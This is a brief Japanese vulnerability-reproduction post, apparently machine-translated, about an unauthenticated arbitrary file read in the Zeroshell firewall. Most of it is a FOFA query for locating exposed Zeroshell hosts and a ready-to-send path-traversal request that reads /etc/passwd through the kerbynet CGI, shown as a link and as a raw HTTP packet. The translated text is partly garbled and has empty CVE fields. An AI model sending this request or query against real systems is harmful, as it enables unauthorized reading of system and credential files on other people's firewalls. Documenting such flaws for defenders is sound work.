記事ディレクトリ
zeroshell ファイアウォールに任意のファイル読み取りの脆弱性が存在します
免責事項: この記事に記載されている関連技術を違法なテストに使用しないでください。この記事で提供される情報やツールの普及と使用によって引き起こされる直接的または間接的な結果と損失は、ユーザー自身が負担するものとします。記事の著者とは何の関係もありません。この記事は教育のみを目的としています。
1.zeroshell ファイアウォールの概要
WeChat 公式アカウント検索: 南峰脆弱性再現ライブラリ
この記事は、南峰脆弱性再現ライブラリ公式アカウントで最初に公開されました。
Zeroshell はミニチュア Linux リリース バージョンで、ルーター、RADIUS、Web ポータル、ファイアウォール、仮想 **、Qos、DHCP、DNS 転送などの強力な機能を備えています。サーバーにインストールしてイントラネット サービスにネットワークを提供できます。
2. 脆弱性の説明
Zeroshell はミニチュア Linux リリース バージョンで、ルーター、RADIUS、Web ポータル、ファイアウォール、仮想 **、Qos、DHCP、DNS 転送などの強力な機能を備えています。サーバーにインストールしてイントラネット サービスにネットワークを提供できます。Zeroshell には任意のファイルを読み取る脆弱性があります。
CVE 番号:
CNNVD 番号:
CNVD 番号:
3. バージョンに影響を与える
4. fofaクエリステートメント
app="ゼロシェル-ファイアウォール"
5. 脆弱性の再発
脆弱性リンク: http://127.0.0.1/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=…/…/…/etc/passwd
脆弱性データ パッケージ:
GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=../../../etc/passwd HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
6.POC&EXP
なし
7. 是正意見
現時点では、メーカーはこのセキュリティ問題を解決するための修正プログラムをリリースしていませんので、本ソフトウェアを使用するユーザーは、メーカーのホームページまたは解決策の参考 URL https://zeroshell.org/ に注意することをお勧めします。